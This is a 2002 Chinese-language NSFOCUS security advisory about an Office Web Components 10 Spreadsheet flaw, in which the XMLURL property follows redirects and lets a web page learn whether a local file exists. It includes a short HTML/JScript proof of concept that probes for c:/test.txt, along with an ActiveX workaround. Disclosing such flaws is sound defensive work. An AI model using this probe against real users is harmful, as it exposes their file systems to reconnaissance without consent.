首页 -> 安全研究

安全研究

安全漏洞
Microsoft OWC Spreadsheet XMLURL本地文件存在性泄露漏洞

发布日期:2002-04-08
更新日期:2002-04-12

受影响系统:
Microsoft Office Web Components 10
描述:
BUGTRAQ  ID: 4455

Microsoft Office Web Components (OWC)是一套ActiveX对象,使用Spreadsheets、Charts、Pivot tables等提供WEB页面更丰富的HTML文档形式。OWC在OFFCIE2000和OFFICE XP下都默认安装,也可以独立的下载使用。

Microsoft Office Web Components (OWC)中的XMLURL属性存在问题,可导致远程攻击者可以通过此属性来判断用户系统上特定文件是否存在。

问题存在于Microsoft Office Web Components (OWC10)中的Spreadsheet组件中,其中的"XMLURL"属性盲目的跟随重定向,攻击者可以通过指定一URL重定向到本地系统文件上并通过错误来判断文件是否存在。

由于OWC存在通过合法的WorkSheet XML文档来读取文件内容,攻击者可以利用上面获得的信息进一步的攻击有此漏洞的系统。

<*来源:GreyMagic Software (security@greymagic.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0097.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GreyMagic Software (security@greymagic.com)提供了如下测试方法:

下面这段代码中的"getFile.asp"内部重定向到"file://c:/test.txt":

<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oSP.XMLURL="getFile.asp";
    }
    catch (oErr) {
        alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" :
"File does not exist.");
    }
}
</script>

可以用上面代码来判断c:/test.txt文件是否存在。

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 通过设置浏览器的安全配置来关闭执行Active X控件。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/Default.asp

浏览次数:3785
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障